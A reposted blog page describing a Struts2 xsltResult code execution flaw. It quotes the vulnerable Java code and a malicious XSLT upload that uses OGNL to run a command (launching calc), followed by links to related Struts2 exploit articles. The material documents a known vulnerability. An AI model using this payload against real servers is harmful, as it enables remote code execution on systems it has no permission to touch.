struts2 xsltResult Local code execution vulnerability

转载 2012年03月26日 12:57:10


the file:

String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
path = pathFromRequest;
URL resource = ServletActionContext.getServletContext().getResource(path);
templates = factory.newTemplates(new StreamSource(resource.openStream()));

A use of the action of xsltResult:
<action name="xslt" class="net.inbreak.xsltAction">
<result type="xslt"/>

An attacker can upload a file:


<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet xmlns:xsl="";
version="1.0" xmlns:ognl="ognl.Ognl">
<xsl:template match="/">
<h2>hacked by kxlzx</h2>
<xsl:value-of select="ognl:getValue(&apos;@Runtime () getRuntime().exec("calc")&apos;, &apos;&apos;)"/>

open url

then struts2 will execute

ognl:getValue(&apos;@Runtime () getRuntime().exec("calc")&apos;, &apos;&apos;)



Struts2 S2-045 RCE Vulnerability Analysis & Brand New Exploit

I haved finished and developped a new exploit poc several days ago, it’s true I didn’t want to publi...

ajax + struts2 return 404 Code

场景描述: 项目上线已经5个多月了,一直很稳定,昨天晚上一个ajax界面突然返回404错误,一开始以为是url出现问题了,测试后发现发送请求后后台正常执行, 直到return SUCCESS时返回40...

Struts 2 Security Vulnerability - Dynamic Method Invocation

Introduction The Struts 2 web application framework has a long-standing security vulnerability that...

struts2 code

  • 2015-06-15 11:17
  • 34.55MB
  • 下载

Struts2 In Action - Source Code

  • 2011-12-06 23:09
  • 6.25MB
  • 下载

FAILED: Execution Error, return code 2 from org.apache.hadoop.hive.ql.exec.tez.TezTask

hive> select count(1) from customer; Query ID = hive_20151113120000_368645da-6763-4ca3-a774-8961d49...

Remote Code Execution as System User on Android 5 Samsung Devices abusing WifiCredService (Hotspot 2

This article explains a recently disclosed vulnerability, independently discovered by the Google's P...

Struts 2 + websocket handshake unexpected response code 404问题

环境: tomcat 7  + Struts 2 Spring4 MyBatis  服务端代码: @ServerEndpoint(value = "/wsServer", configurato...